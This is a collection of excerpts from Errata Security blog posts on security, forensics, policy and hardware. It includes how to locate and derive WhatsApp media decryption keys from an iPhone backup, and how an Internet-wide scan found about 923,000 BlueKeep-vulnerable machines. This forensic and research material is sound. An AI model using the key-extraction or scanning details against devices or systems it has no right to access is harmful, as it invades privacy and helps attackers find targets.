Their job wasn't to do an unbiased investigation of the phone, but instead, to find evidence confirming the suspicion that the Saudis hacked Bezos.Remember the story started in February of 2019 when the National Inquirer tried to extort Jeff Bezos with sexts between him and his paramour Lauren Sanchez. Bezos immediately accused the Saudis of being involved. Even after it was revealed that the sexts came from Michael Sanchez, the paramour's brother, Bezos's team double-downed on their accusations the Saudi's hacked Bezos's phone.The FTI report tells a story beginning with Saudi Crown Prince sending Bezos a message using WhatsApp containing a video. The story goes:The downloader that delivered the 4.22MB video was encrypted, delaying or preventing further study of the code delivered along with the video. It should be noted that the encrypted WhatsApp file sent from MBS' account was slightly larger than the video itself.This story is invalid. Such messages use end-to-end encryption, which means that while nobody in between can decrypt them (not even WhatsApp), anybody with possession of the ends can. That's how the technology is supposed to work. If Bezos loses/breaks his phone and needs to restore a backup onto a new phone, the backup needs to have the keys used to decrypt the WhatsApp messages.Thus, the forensics image taken by the investigators had the necessary keys to decrypt the video -- the investigators simply didn't know about them. 
In a previous blogpost I explain these magical WhatsApp keys and where to find them, so that anybody, even you at home, can do forensics on their own iPhone, retrieve these keys, and decrypt their own videos.

(2020-01-28, https://blog.erratasec.com/2020/01/theres-no-evidence-saudis-hacked-jeff.html)

Errata Security - How to decrypt WhatsApp end-to-end media files

End-to-end encrypted downloader

The FTI report says that within hours of receiving a suspicious video, Bezos's iPhone began behaving strangely. The report says:

...analysis revealed that the suspect video had been delivered via an encrypted downloader hosted on WhatsApp's media server. Due to WhatsApp's end-to-end encryption, the contents of the downloader cannot be practically determined.

The phrase "encrypted downloader" is not a technical term but something the investigators invented. It sounds like a term we use in malware/viruses, where a first stage downloads later stages using encryption. But that's not what happened here.

Instead, the file in question is simply the video itself, encrypted, with a few extra bytes due to encryption overhead (10 bytes of checksum at the start, up to 15 bytes of padding at the end).

Now let's talk about "end-to-end encryption". This only means that those in the middle can't decrypt the file, not even WhatsApp's servers. But those on the ends can -- and that's what we have here, one of the ends. Bezos can upgrade his old iPhone X to a new iPhone XS by backing up the old phone and restoring onto the new phone and still decrypt the video. That means the decryption key is somewhere in the backup.

Specifically, the decryption key is in the file named 7c7fba66680ef796b916b067077cc246adacf01d in the backup, in the table named ZWAMDIAITEM, as the first protobuf field in the field named ZMEDIAKEY.
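Public write-ups of the WhatsApp media format describe that 32-byte media key being expanded with HKDF-SHA256 into an IV, an AES-256 key, and a MAC key. A sketch of that derivation using only the standard library; the info string and the slice layout here are assumptions taken from those write-ups (real clients may also run an extract step with a zero salt first), not details from this post:

```python
import hashlib
import hmac

def hkdf_expand(key: bytes, info: bytes, length: int) -> bytes:
    """RFC 5869 HKDF-Expand with SHA-256: chain HMAC blocks until
    enough output keying material has been produced."""
    okm, block, counter = b"", b"", 1
    while len(okm) < length:
        block = hmac.new(key, block + info + bytes([counter]),
                         hashlib.sha256).digest()
        okm += block
        counter += 1
    return okm[:length]

# Placeholder: the real 32-byte key comes from the ZMEDIAKEY field.
media_key = bytes(32)

# Assumed info string and layout, per public write-ups of the format.
expanded = hkdf_expand(media_key, b"WhatsApp Video Keys", 112)
iv, cipher_key, mac_key = expanded[:16], expanded[16:48], expanded[48:80]
```

With `cipher_key` and `iv` in hand, the media file would then decrypt with ordinary AES-256-CBC, which is why possession of the backup is possession of the plaintext.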
These details are explained below.

WhatsApp end-to-end encryption of video

Let's discuss how videos are transmitted using text messages.

We'll start with SMS, the old messaging system built into the phone system that predates modern apps. It can only send short text messages of a few hundred bytes at a time. These messages are too small to hold a complete video many megabytes in size. They are sent through the phone system itself, not via the Internet.

When you send a video via SMS, what happens is that the video is uploaded to the phone company's servers via HTTP. Then, a text message is sent with a URL link to the video. When the recipient gets the message, their phone downloads the video from the URL. The text messages going through the phone system just contain the URL; an Internet connection is used to transfer the video.

This happens transparently to the user. The user just sees the video and not the URL. They'll only notice a difference when using ancient 2G mobile phones that can get the SMS messages but which can't actually connect to the Internet.

A similar thing happens with WhatsApp, only with encryption added.

The sender first encryp…

(2020-01-28, https://blog.erratasec.com/2020/01/how-to-decrypt-whatsapp-end-to-end.html)

Errata Security - So that tweet was misunderstood
As Bernie Sanders (a 2020 presidential candidate) puts it:“The original insulin patent expired 75 years ago. Instead of falling prices, as one might expect after decades of competition, three drugmakers who make different versions of insulin have continuously raised prices on this life-saving medication.”This is called "evergreening", as described in articles like this one that claim insulin makers have been making needless small improvements to keep their products patent-protected, so that they don't have to compete against generics whose patents have expired.It's Democrats like Bernie who claim expensive insulin is little different than cheaper insulin, not me. If you disagree, go complain to him, not me.Bernie is wrong, by the way. The more expensive "insulin analogs" result in dramatically improved blood sugar control for Type 1 diabetics. The results are life changing, especially when combined with glucose monitors and insulin pumps. Drug companies deserve to recoup the billions spent on these advances. My original point is still true that "cheap insulin" is better than "no insulin", but it's also true that it's far worse than modern, more expensive insulin.Anyway, I wasn't really focused on that part of the argument but the other part, how list prices are an exaggeration. They are a fiction that nobody needs to pay, even those without insurance. They aren't the result of price gouging by drug manufacturers, as Elizabeth Warren claims. 
Bu…

(2019-12-30, https://blog.erratasec.com/2019/12/when-tweets-are-taken-out-of-context.html)

Errata Security - This is finally the year of the ARM server

(2019-12-13, https://blog.erratasec.com/2019/12/this-is-finally-year-of-arm-server.html)

Errata Security - CrowdStrike-Ukraine Explained
I'm sure if I looked at all the evidence, I'd have more doubts, but at the same time, of the politicized hacking incidents out there, this one seems to have the best (public) support for its conclusion.

What's the conspiracy?

The basis of the conspiracy is that the DNC hack was actually an inside job. Some former intelligence officials led by Bill Binney claim they looked at some data and found that the files were copied "locally" instead of across the Internet, and that therefore it was an insider who did it and not a remote hacker.

I debunk the claim here, but the short explanation is: of course the files were copied "locally" -- the hacker was inside the network. In my long experience investigating hacker intrusions, and performing them myself, I know this is how it's normally done. I mention my own experience because I'm technical and know these things, in contrast with Bill Binney and those other intelligence officials who have no experience with such things. He sounds impressive as someone formerly of the NSA, but he was a mid-level manager in charge of budgets. Binney has never performed a data-breach investigation and has never performed a pentest.

There are other parts to the conspiracy. In the middle of all this, a DNC staffer was murdered on the street, possibly due to a mugging. Naturally this gets included as part of the conspiracy: this guy ("Seth Rich") must've been the "insider" in this attack, and mus…

(2019-09-26, https://blog.erratasec.com/2019/09/crowdstrike-ukraine-explained.html)

Errata Security - Thread on the OSI model is a lie

A Twitter thread on the OSI model. Below it's compiled into one blogpost.
Yea, I've got 3 hours to kill here in this airport lounge waiting for the next leg of my flight, so let's discuss the "OSI Model". There's no such thing. What they taught you is a lie, and they knew it was a lie, and they didn't care, because they are jerks.

You know what REALLY happened when the kid pointed out the king was wearing no clothes? The kid was punished. Nobody cared. And the king went on wearing the same thing, which everyone agreed was made from the finest of cloth.

The OSI Model was created by the international standards organization for an alternative internet that was too complicated to ever work, and which never worked, and which never came to pass.

Sure, when they created the OSI Model, the Internet layered model already existed, so they made sure to include today's Internet as part of their model. But the focus and intent of the OSI's efforts was on dumb networking concepts that worked differently from the Internet.

OSI wanted a "connection-oriented network layer", one that worked like the telephone system, where every switch in between the ends knows about the connection. The Internet is based on a "connectionless network layer".

Likewise, the big standards bo…
(2019-08-31, https://blog.erratasec.com/2019/08/thread-on-osi-model-is-lie.html)
Errata Security - Thread on network input parsers

A thread on input parsers. I thought I'd copy the thread here as a blogpost.
I am spending far too long on this chapter on "parsers". It's this huge gaping hole in Computer Science where academics don't realize it's a thing. It's like physics missing one of Newton's laws, or medicine ignoring broken bones, or chemistry ignoring fluorine.

The problem is that without existing templates of how "parsing" should be taught, it's really hard coming up with a structure for describing it from scratch.

"Langsec" has the best model, but at the same time, it's a bit abstract ("input is a language that drives computation"), so I want to ease into it with practical examples for programmers.
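The langsec idea mentioned above ("input is a language that drives computation") can be made concrete with a toy example. The sketch below is hypothetical, not code from the chapter: a parser for simple type-length-value records that validates every length field against the remaining input before trusting it, which is the practical habit a programmer-oriented treatment would start with.

```python
def parse_tlv(buf: bytes) -> list:
    """Parse TLV records: 1 byte type, 1 byte length, then the value bytes.

    Every length is checked against the remaining input before any read,
    so a malicious length field cannot cause an out-of-bounds access.
    """
    records = []
    i = 0
    while i < len(buf):
        if len(buf) - i < 2:
            raise ValueError("truncated TLV header")
        rtype, rlen = buf[i], buf[i + 1]
        i += 2
        if len(buf) - i < rlen:   # reject before reading, langsec-style
            raise ValueError("length field exceeds remaining input")
        records.append((rtype, buf[i:i + rlen]))
        i += rlen
    return records
```

Fed a record whose length field claims more bytes than actually exist, this raises an error instead of reading past the buffer, which is exactly the class of bug that ad-hoc parsers get wrong.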
(2019-08-31, https://blog.erratasec.com/2019/08/thread-on-network-input-parsers.html)
Errata Security - Hacker Jeopardy, Wrong Answers Only Edition

…assignments of well-known ports, is 23. A good wrong answer is this one, port 25, where the Morris Worm spread via port 25 (SMTP) via the DEBUG command:

"pre-1988 it was 25, but you had to type DEBUG after connecting 😉" - pukingmonkey🐒 (@pukingmonkey) August 10, 2019

But the real correct response is port 21. The problem posed wasn't about which port was assigned to Telnet (port 23), but what you normally see these days.

Port 21 is assigned to FTP, the file transfer protocol. A little-known fact about FTP is that it uses Telnet for its command channel on port 21. In other words, FTP isn't a text-based protocol like SMTP, HTTP, POP3, and so on. Instead, it's layered on top of Telnet. It says so right in RFC 959.

When we look at the popular FTP implementations, we see that they do respond to Telnet control codes on port 21. There are a ton of FTP implementations, of course, so some don't respond to Telnet and instead treat it as a straight text protocol. But the vast majority of what's out there are implementations that do the Telnet as defined.

Consider network intrusion detection systems. When they decode FTP, they do so with their Telnet protocol parsers. You can see this in the Snort source code, for example.

The question is "normally seen". Well, Telnet on port 23 has largely been replaced by SSH on port 22, so you don't normally see it on port 23. However, FTP is still popular. While I don't have a hard study to point to, in my experience the amount of traffic seen on port 21 is vastly higher than that seen on port 23. QED: the port where Telnet is normally seen is port 21.

But the original problem wasn't so much "traffic" seen, but "available". That's a problem we can study with port scanners -- especially mass port scans of the entire Internet. Rapid7 has their yearly Internet Exposure Report.
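The point above, that FTP's port-21 command channel is Telnet underneath, can be sketched in code. The function below is a hypothetical minimal filter (not Snort's actual parser): it strips Telnet IAC command sequences from a control-channel byte stream, which is roughly what a protocol decoder must do before it sees the plain FTP text. It assumes well-formed input.

```python
IAC, SB, SE = 255, 250, 240         # Telnet command bytes (RFC 854)
NEGOTIATE = (251, 252, 253, 254)    # WILL, WONT, DO, DONT take one option byte

def strip_telnet(data: bytes) -> bytes:
    """Remove Telnet command sequences, leaving the plain FTP command text."""
    out = bytearray()
    i = 0
    while i < len(data):
        b = data[i]
        if b != IAC:                    # ordinary text byte
            out.append(b)
            i += 1
        elif data[i + 1] == IAC:        # escaped 0xFF data byte
            out.append(IAC)
            i += 2
        elif data[i + 1] in NEGOTIATE:  # IAC WILL/WONT/DO/DONT <option>
            i += 3
        elif data[i + 1] == SB:         # subnegotiation: skip past IAC SE
            i = data.index(bytes([IAC, SE]), i + 2) + 2
        else:                           # any other two-byte command
            i += 2
    return bytes(out)
```

For example, a server that sends IAC DO TERMINAL-TYPE (0xFF 0xFD 0x18) ahead of a command would have that sequence removed, leaving only the text.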
According to that report, port 21 is three times as available on the public Internet as port 23.

(2019-08-10, https://blog.erratasec.com/2019/08/hacker-jeopardy-wrong-answers-only.html)

Errata Security - Securing devices for DEFCON

…phones or laptops). A better discussion would be to list those things you should do to secure yourself before going, just in case. These are the things I worry about:

- backup before you go
- update before you go
- correctly locking your devices with full disk encryption
- correctly configuring WiFi
- Bluetooth devices
- mobile phone vs. Stingrays
- USB

Backup

Traveling means a higher chance of losing your device. In my review of crime statistics, theft seems less of a threat than in whatever city you are coming from. My guess is that while thieves may want to target tourists, the police want, even more, to target gangs of thieves, to protect the cash cow that is the tourist industry. But you are still more likely to accidentally leave a phone in a taxi or have your laptop crushed in the overhead bin. If you haven't recently backed up your device, now would be an extra useful time to do this.

Anything I want backed up on my laptop is already in Microsoft's OneDrive, so I don't pay attention to this. However, I have a lot of pictures on my iPhone that I don't have in iCloud, so I copy those off before I go.

Update

Like most of you, I put off updates unless they are really important, updating every few months rather than every month. Now is a great time to make sure you have the latest updates.

Backup before you update -- but then, I already mentioned that above.

Full disk encryption

This is enabled by default on phones, but not the default for laptops. It means that if you lose your device, adversaries can't read any data from it.

You are at risk if you have a simple unlock code, like a predictable pattern or a 4-digit code.
The longer and less predictable your unlock code, the more secure you are.

I use iPhone's "face id" on my phone so that people looking over my shoulder can't figure out my passcode when I need to unlock the phone. However, because this enables the police to easily unlock my phone, by putting it in front of my face, I also remember how to quickly disable "face id" (by holding the buttons on both sides for 2 seconds).

As for laptops, it's usually easy to enable full disk encryption. However, there are some gotchas. Microsoft requires a TPM for its BitLocker full disk encryption, which your laptop might not support. I don't know why all laptops don't just have TPMs, but they don't. You may be able to use some tricks to get around this. There are also third-party full disk encryption products that use simple passwords.

If you don't have a TPM, then hackers can brute-force crack your password, trying billions per second. This applies to my MacBook Air, which is the 2017 model, before Apple started adding their "T2" chip to all their laptops. Therefore, I need a strong login password.

I deal with this on my MacBook by having two accounts. When I power on the device, I log into an account using a long/complicated password. I then switch to an account with a simpler password for going in/out of sleep mode. This second account can't be used to decrypt the drive.

On Linux, my password to decrypt the drive is similarly long, while the user account password is pretty short.

I ignore the "evil maid" threat, because my devices are always with me rather than in…

(2019-08-04, https://blog.erratasec.com/2019/08/securing-devices-for-defcon.html)

Errata Security - Why we fight for crypto

William Barr called for crypto backdoors. His speech is a fair summary of law enforcement's side of the argument.
In this post, I'm going to address many of his arguments.

The tl;dr version of this blog post is this:

- Their claims of mounting crime are unsubstantiated, based on emotional anecdotes rather than statistics. We live in a Golden Age of Surveillance where, if any balancing is to be done in the privacy vs. security tradeoff, it should be in favor of more privacy.
- But we aren't talking about a tradeoff only with privacy, but with other rights. In particular, it's every bit as important to protect the rights of political dissidents to keep some communications private (encryption) as it is to allow them to make other communications public (free speech). In addition, there is no solution to their "going dark" problem that doesn't restrict the freedom to run arbitrary software of the user's choice on their computers/phones.
- Thirdly, there is the problem of technical feasibility. We don't know how to make backdoors available for law-enforcement access in a way that doesn't enormously reduce security for users.

Balance

The crux of his argument is balancing civil rights vs. safety, also described as privacy vs. security. This balance is expressed in the constitution by the Fourth Amendment. The Fourth doesn't express an absolute right to privacy, but allows police to invade your privacy if they can show an independent judge that they have "probable cause". By making communications "warrant proof", encryption is creating a "law free zone" enabling crime to be conducted without the ability of the police to investigate.

It's a reasonable argument. If your child gets kidnapped by sex traffickers, you'll be demanding the police do something, anything, to get your child back safe. If a phone is found at the scene, you'll definitely want them to have the ability to decrypt the phone, as long as a judge gives them a search warrant to balance civil-liberty concerns.

However, this argument is wrong, as I'll discuss below.

Law free zones

Barr claims encryption creates a new "law free zone ...
giving criminals the means to operate free of lawful scrutiny". He pretends that such zones never existed before.

Of course they've existed before. Attorney-client privilege is one example, which is definitely abused to further crime. Barr's own boss has committed obstruction of justice, hiding behind the law-free zone of Article II of the constitution. We are surrounded by legal loopholes that criminals exploit in order to commit crimes, where the cost of closing the loophole is greater than the benefit.

The biggest "law free zone" that exists is just the fact that we don't live in a universal surveillance state. I think impure thoughts without the police being able to read my mind. I can whisper quietly in your ear at a bar without the government overhearing. I can invite you over to my house to plot nefarious deeds in my living room.

Technology didn't create these zones. However, technological advances are allowing police to defeat them.

Businesses have security cameras everywhere. Neighborhood associations are installing license-plate readers. We are putting Echo/OkGoogle/Cortana/Siri devices in our homes listening to us. Our phones and computers have microphones and cameras. Our TVs increasingly have cameras and mics, too, in case we want to use them for video conferencing, or to give them voice commands.

Every argument Barr makes about crypto backdoors applies to backdoor access to microphones; every argument applies to forcing TVs to have a backdoor allowing police armed with a warrant to turn on the camera in your living room. These…

(2019-07-28, https://blog.erratasec.com/2019/07/why-we-fight-for-crypto.html)

Errata Security - Censorship vs. the memes

You can't yell fire in a crowded movie theater

This phrase was first used in the Supreme Court decision Schenck v. United States to justify outlawing protests against the draft.
Unless you also believe the government can jail you for protesting the draft, the phrase is bankrupt of all meaning. In other words, how can it be used to justify censoring the thing you want censored, and yet be an invalid justification for censoring those things (like draft protests) you don't want censored?

What this phrase actually means is that because it's okay to suppress one type of speech, it justifies censoring any speech you want. Which means all censorship is valid. If that's what you believe, just come out and say "all censorship is valid".

But this speech is harmful or invalid

That's what everyone says. In the history of censorship, nobody has ever wanted to censor good speech, only speech they claimed was objectively bad, invalid, unreasonable, malicious, or otherwise harmful.

It's just that everybody has a different definition of what actually is bad, harmful, or invalid. It's like the movie-theater quote. For example, China's constitution proclaims freedom of speech, yet the government blocks all mention of the Tiananmen Square massacre because it's harmful. Its "Great Firewall of China" is famous for blocking most of the content of the Internet that the government claims harms its citizens.

"I put some photos of the Tiananmen anniversary mass vigil in #Hongkong last night onto Wechat and my account has been suspended for 'spreading malicious rumours'. The #China of today..." pic.twitter.com/F6e2exsgGE - Stephen McDonell (@StephenMcDonell) June 5, 2019

At least in the case of movie theaters, the harm of shouting "fire" is immediate and direct. In all these other cases, the harm is many steps removed. Many want to censor anti-vaxxers, because their speech kills children. But the speech doesn't kill; the virus does.
By extension, those not getting vaccinations may harm peopl…

(2019-06-14, https://blog.erratasec.com/2019/06/censorship-vs-memes.html)

Errata Security - Some Raspberry Pi compatible computers

https://docs.google.com/spreadsheets/d/1jWMaK-26EEAKMhmp6SLhjScWW2WKH4eKD-93hjpmm_s/edit#gid=0

Consider the Upboard, an x86 computer in the Raspberry Pi form factor for $99. When you include storage, power supplies, heatsinks, cases, and so on, it's actually pretty competitive. It's not ARM, so many things built for the Raspberry Pi won't necessarily work. But on the other hand, most of the software built for the Raspberry Pi was originally developed for x86 anyway, so sometimes it'll work better.

Consider the quasi-RPi boards that support the same GPIO headers, but in a form factor that's not the same as a RPi. A good example would be the ODroid-N2. These aren't listed in the above spreadsheet, but there's a ton of them. There are only two Nano Pis listed in the spreadsheet having the same form factor as the RPi, but there are around 20 different actual boards with all sorts of different form factors and capabilities.

Consider the heatsink, which can make a big difference in the performance and stability of the board. You can put a small heatsink on any board, but you really need larger heatsinks and possibly fans. Some boards, like the ODroid-C2, come with a nice large heatsink. Other boards have a custom-designed large heatsink you can purchase along with the board for around $10. The Raspberry Pi, of course, has numerous third-party heatsinks available. Whether or not there's a nice large heatsink available is an important buying criterion. That spreadsheet should have a column for "Large Heatsink", whether one is "Integrated" or "Available".

Consider power consumption and heat dissipation as a buying criterion.
Uniquely among the competing devices, the Raspberry Pi itself uses a CPU fabbed on a 40nm process, whereas most of the competitors use 28nm or even 14nm. That means it consumes more power and produces more heat than any of its competitors, by a large margin. The Intel Atom CPU mentioned above is actually one of the most power efficient, being fabbed on a 14nm process. Ideally, that spreadsheet would have two additional columns for power consumption (and hence heat production) at "Idle" and "Load".

You shouldn't really care about CPU speed. But if you do, there are basically two classes of speed: in-order and out-of-order. For the same GHz, out-of-order CPUs are roughly twice as fast as in-order. The Cortex-A5, A7, and A53 are in-order. The Cortex-A17, A72, and A73 (and Intel Atom) are out-of-order. The spreadsheet also lists some NXP i.MX series processors, but those are actually ARM Cortex designs. I don't know which, though.

The spreadsheet lists memory, like LPDDR3 or DDR4, but it's unclear as to speed. There are two things that determine speed: the number of MHz/GHz and the width, typically either 32 bits or 64 bits. By "64 bits" we can mean a single channel that's 64 bits wide, as in the case of the Intel Atom processors, or two channels that are each 32 bits wide, as in the case of some ARM processors. The Raspberry Pi has an incredibly anemic 32-bit 400-MHz memory, whereas some competitors have 64-bit 1600-MHz memory, or roughly 8 times the speed. For CPU-bound tasks, this isn't so important, but a lot of tasks are in fact bound by memory speed.

As for GPUs, most are not OpenCL-programmable, but some are. The VideoCore and Mali 4xx (Utgard) GPUs are not programmable. The Mali Txxx (Midgard) GPUs are programmable. The "MP2" suffix means two GPU processors, whereas "MP4" means four GPU processors.
For a lot of tasks, such as "SDR" (software-defined radio), offloading onto the GPU simultaneously reduce…

(2019-05-31, https://blog.erratasec.com/2019/05/some-raspberry-pi-compatible-computers.html)

Errata Security - Your threat model is wrong

Phishing

An example is this question that misunderstands the threat of "phishing":

"Should failing multiple phishing tests be grounds for firing? I ran into a guy at a recent conference, said his employer fired people for repeatedly falling for (simulated) phishing attacks. I talked to experts, who weren't wild about this disincentive. https://t.co/eRYPZ9qkzB pic.twitter.com/Q1aqCmkrWL" - briankrebs (@briankrebs) May 29, 2019

The (wrong) threat model here is that phishing is an email that smart users with training can identify and avoid. This isn't true.

Good phishing messages are indistinguishable from legitimate messages. Said another way, a lot of legitimate messages are in fact phishing messages, such as when HR sends out a message saying "log into this website with your organization username/password".

"Recently, my university sent me an email for mandatory Title IX training, not digitally signed, with an external link to the training, that requested my university login creds for access, that was sent from an external address but from the Title IX coordinator." - Tyler Pieron (@tyler_pieron) May 29, 2019

Yes, it's amazing how easily stupid employees are tricked by the most obvious of phishing messages, and you want to point and laugh at them. But frankly, you want the idiot employees doing this. The more obvious phishing attempts are the least harmful and a good test of the rest of your security -- which should be based on the assumption that users will frequently fall for phishing.

In other words, if you paid attention to the threat model, you'd be mitigating the threat in other ways and not even bother training employees.
You'd be firing HR idiots for phishing employees, not punishing employees for getting tricked. Your systems would be resilient against successful phishes, such as by using two-factor authentication.

IoT security

After the Mirai worm, government types pushed for laws to secure IoT devices, as billions of insecure devices like TVs, cars, security cameras, and toasters are added to the Internet. Everyone is afraid of the next Mirai-type worm. For example, they are pushing for devices to be auto-updated.

But auto-updates are a bigger threat than worms.

Since Mirai, roughly 10 billion new IoT devices have been added to the Internet, yet there hasn't been a Mirai-sized worm. Why is that? After 10 billion new IoT devices, it's still Windows and not IoT that is the main problem.

The answer is that number, 10 billion. Internet worms work by guessing IPv4 addresses, of which there are only 4 billion. You can't have 10 billion new devices on public IPv4 addresses because there simply aren't enough addresses. Instead, those 10 billion devices are almost entirely being put on private ne…

(2019-05-29, https://blog.erratasec.com/2019/05/your-threat-model-is-wrong.html)

Errata Security - Almost One Million Vulnerable to BlueKeep Vuln (CVE-2019-0708)

…masscan, my Internet-scale port scanner, looking for port 3389, the one used by Remote Desktop. This takes a couple hours, and lists all the devices running Remote Desktop -- in theory.

This returned 7,629,102 results (over 7 million). However, there is a lot of junk out there that'll respond on this port. Only about half are actually Remote Desktop.

Masscan only finds the open ports, but is not complex enough to check for the vulnerability. Remote Desktop is a complicated protocol.
A project was posted that could connect to an address and test it, to see if it was patched or vulnerable. I took that project and optimized it a bit, rdpscan, then used it to scan the results from masscan. It's a thousand times slower, but it's only scanning the results from masscan instead of the entire Internet.

The table of results is as follows:

1447579  UNKNOWN - receive timeout
1414793  SAFE - Target appears patched
1294719  UNKNOWN - connection reset by peer
1235448  SAFE - CredSSP/NLA required
 923671  VULNERABLE -- got appid
 651545  UNKNOWN - FIN received
 438480  UNKNOWN - connect timeout
 105721  UNKNOWN - connect failed 9
  82836  SAFE - not RDP but HTTP
  24833  UNKNOWN - connection reset on connect
   3098  UNKNOWN - network error
   2576  UNKNOWN - connection terminated

The various UNKNOWN things fail for various reasons. A lot of them are because the protocol isn't actually Remote Desktop and responds weirdly when we try to talk Remote Desktop. A lot of others are Windows machines, sometimes vulnerable and sometimes not, which for some reason return errors.

The important results are those marked VULNERABLE. There are 923,671 vulnerable machines in this result. That means we've confirmed the vulnerability really does exist, though it's possible a small number of these are "honeypots" deliberately pretending to be vulnerable in order to monitor hacker activity on the Internet.

The next results are those marked SAFE due to probably being patched. Actually, it doesn't necessarily mean they are patched Windows boxes. They could instead be non-Windows systems that appear the same as patched Windows boxes. But either way, they are safe from this vulnerability. There are 1,414,793 of them.

The next results to look at are those marked SAFE due to CredSSP/NLA failures, of which there are 1,235,448. This doesn't mean they are patched, only that we can't exploit them. They require "network level authentication" first before we can talk Remote Desktop to them.
That means we can't test whether they are patched or vulnerable -- but neither can the hackers. They may still be exploitable by an insider threat who knows a valid username/password, but they aren't exploitable by anonymous hackers or worms.

The next category is marked as SAFE because they aren't Remote Desktop at all, but HTTP servers. In other words, in response to o…

(2019-05-28, https://blog.erratasec.com/2019/05/almost-one-million-vulnerable-to.html)

Errata Security - A lesson in journalism vs. cybersecurity

…blaming the NSA for a ransomware attack on Baltimore is typical bad journalism. It's an op-ed masquerading as a news article. It cites many people to support the conclusion that the NSA is to be blamed, but only a single quote, from the NSA director, from the opposing side. Yet many experts oppose this conclusion, such as @dave_maynor, @beauwoods, @daveaitel, @riskybusiness, @shpantzer, @todb, @hrbrmst, ... It's not as if these people are hard to find; it's that the story's authors didn't look.

The main reason experts disagree is that the NSA's EternalBlue isn't actually responsible for most ransomware infections. It's almost never used to start the initial infection -- that's almost always phishing or website vulns. Once inside, it's almost never used to spread laterally -- that's almost always done with Windows networking and stolen credentials. Yes, ransomware increasingly includes EternalBlue as part of its arsenal of attacks, but this doesn't mean EternalBlue is responsible for ransomware.

The NYTimes story takes extraordinary effort to jump around this fact, deliberately misleading the reader to conflate one with the other. A good example is this paragraph:

That link is a warning from last July about the "Emotet" ransomware and makes no mention of EternalBlue.
Instead, the story is citing anonymous researchers claiming that EternalBlue has been added to Emotet after that DHS warning.

Who are these anonymous researchers? The NYTimes article doesn't say. This is bad journalism. The principles of journalism are that you are supposed to attribute where you got such information, so that the reader can verify for themselves whether the information is true or false, or at least credible.

And in this case, it's probably false. The likely source for that claim is this article from Malwarebytes about Emotet. They have since retracted this claim, as the latest version of their article points out.

In any event, the NYTimes article claims that Emotet is now "relying" on the NSA's EternalBlue to spread. That's not the same thing as "using", not even close. Yes, lots of ransomware has been updated to also use EternalBlue to spread. However, what ransomware is relying upon is still the Wind…

(2019-05-27, https://blog.erratasec.com/2019/05/a-lesson-in-journalism-vs-cybersecurity.html)

Errata Security - Programming languages infosec professionals should learn

Also tl;dr: whatever language you decide to learn, also learn how to use an IDE with visual debugging, rather than just a text editor. That probably means Visual Studio Code from Microsoft. Also, whatever language you learn, stash your code at GitHub.

Let's talk in general terms. Here are some types of languages.

Unavoidable. As mentioned above, familiarity with JavaScript, bash/PowerShell, and SQL is unavoidable. If you are avoiding them, you are doing something wrong.

Small scripts. You need to learn at least one language for writing quick-and-dirty command-line scripts to automate tasks or process data. As a tool-using animal, this is your basic tool. You are a monkey; this is the stick you use to knock down the banana.
Good choices are JavaScript, Python, and Ruby. Some domain-specific languages can also work, like PHP and Lua. Those skilled in bash/PowerShell can do a surprising amount of "programming" tasks in those languages. Old-timers use things like Perl or Tcl. Sometimes the choice of which language to learn depends upon the vast libraries that come with the language, especially Python and JavaScript libraries.

Development languages. Those scripting languages have grown up into real programming languages, but for the most part, "software development" means languages designed for that task, like C, C++, Java, C#, Rust, Go, or Swift.

Domain-specific languages. The language Lua is built into nmap, Snort, Wireshark, and many games. Ruby is the language of Metasploit. Further afield, you may end up learning languages like R or MATLAB. PHP is incredibly important for web development. Mobile apps may need Java, C#, Kotlin, Swift, or Objective-C.

As an experienced developer, here are my comments on the various languages, sorted in alphabetical order.

bash (and other Unix shells)

You have to learn some bash for dealing with the command line. But it's also a fairly complete programming language. Peruse the scripts in an average Linux distribution, especially some of the older ones, and you'll find that bash makes up a substantial amount of what we think of as the Linux operating system. Actually, it's called bash/Linux.

In the Unix world, there are lots of other related shells that aren't bash, which have slightly different syntax. A good example is BusyBox, which has "ash". I mention this because my bash skills are rather poor, partly because I originally learned "csh" and get my syntax variants confused.

As a hard-core developer, I end up just programming in JavaScript or even C rather than trying to create complex bash scripts. But you shouldn't look down on complex bash scripts, because they can do great things.
In particular, if you are a pentester, the shell is often the only language you'll get when hacking into a system, so good bash language skills are a must.

C

This is the development language I use the most, simply because I'm an old-time "systems" developer. What "systems programming" means i…

(2019-04-23, https://blog.erratasec.com/2019/04/programming-languages-infosec.html)

Errata Security - Was it a Chinese spy or confused tourist?

Politico has an article from a former spy analyzing whether the "spy" they caught at Mar-a-Lago (Trump's Florida vacation spot) was actually a "spy". I thought I'd add to it from a technical perspective about her malware, USB drives, phones, cash, and so on.

The part that has gotten the most press is that she had a USB drive with evil malware. We've belittled the Secret Service agents who infected themselves, and we've used this as the most important reason to suspect she was a spy.

But it's nonsense.

It could be something significant, but we can't know that based on the details that have been reported. What the Secret Service reported was that it "started installing software". That's a symptom of a USB device installing drivers, not malware. Common USB devices, such as WiFi adapters, Bluetooth adapters, microSD readers, and 2FA keys, look identical to flash drives, and when inserted into a computer, cause Windows to install drivers.

Visible "installing files" is not a symptom of malware. When malware does its job right, there are no symptoms. It installs invisibly in the background. That's the entire point of malware: that you don't know it's there. That's not to say there would be no visible evidence. A popular way of hacking desktops with USB drives is by emulating a keyboard/mouse that quickly types commands, which will cause some visual artifacts on the screen.
It's just that "installing files" does not lend itself to malware as being the most likely explanation. That it was "malware" instead of something normal is just the standard trope that anything unexplained is proof of hackers/viruses. We have no evidence it was actually malware, and the evidence we do have suggests something other than malware.

Lots of travelers carry wads of cash. I carry ten $100 bills with me, hidden in my luggage, for emergencies. I've been caught before when the credit card company fraud detection triggers in a foreign country, leaving me with nothing. It's very distressing, hence cash.

The Politico story mentioned the "spy" also has a U.S. bank account, and thus cash wasn't needed. Well, I carry that cash, too, for domestic travel. It's not just for international travel. In any case, the U.S. may have been just one stop on a multi-country itinerary. I've taken several "round the world" trips where I've just flown one direction, such as east, before getting back home. $8k is in the range of cash that such travelers carry.

The same is true of phones and SIMs. Different countries have different frequencies and technologies. In the past, I've traveled with as many as three phones (US, Japan, Europe). It's gotten better with modern 4G phones, where my iPhone Xs should work everywhere. (Though it's likely going to diverge again with 5G, as the U.S. goes on a different path from the rest of the world.)

The same is true with SIMs. In the past, you pretty much needed a different SIM for each country. Arrival at the airport meant going to the kiosk to get a SIM for $10. At the end of a long itinerary, I'd arrive home with several SIMs. These days, however, with so many "MVNOs", such as Google Fi, this is radically less necessary. However, the fact that the latest high-end phones all support dual SIMs proves it's still an issue.

Thus, the evidence so far is that of a normal traveler.
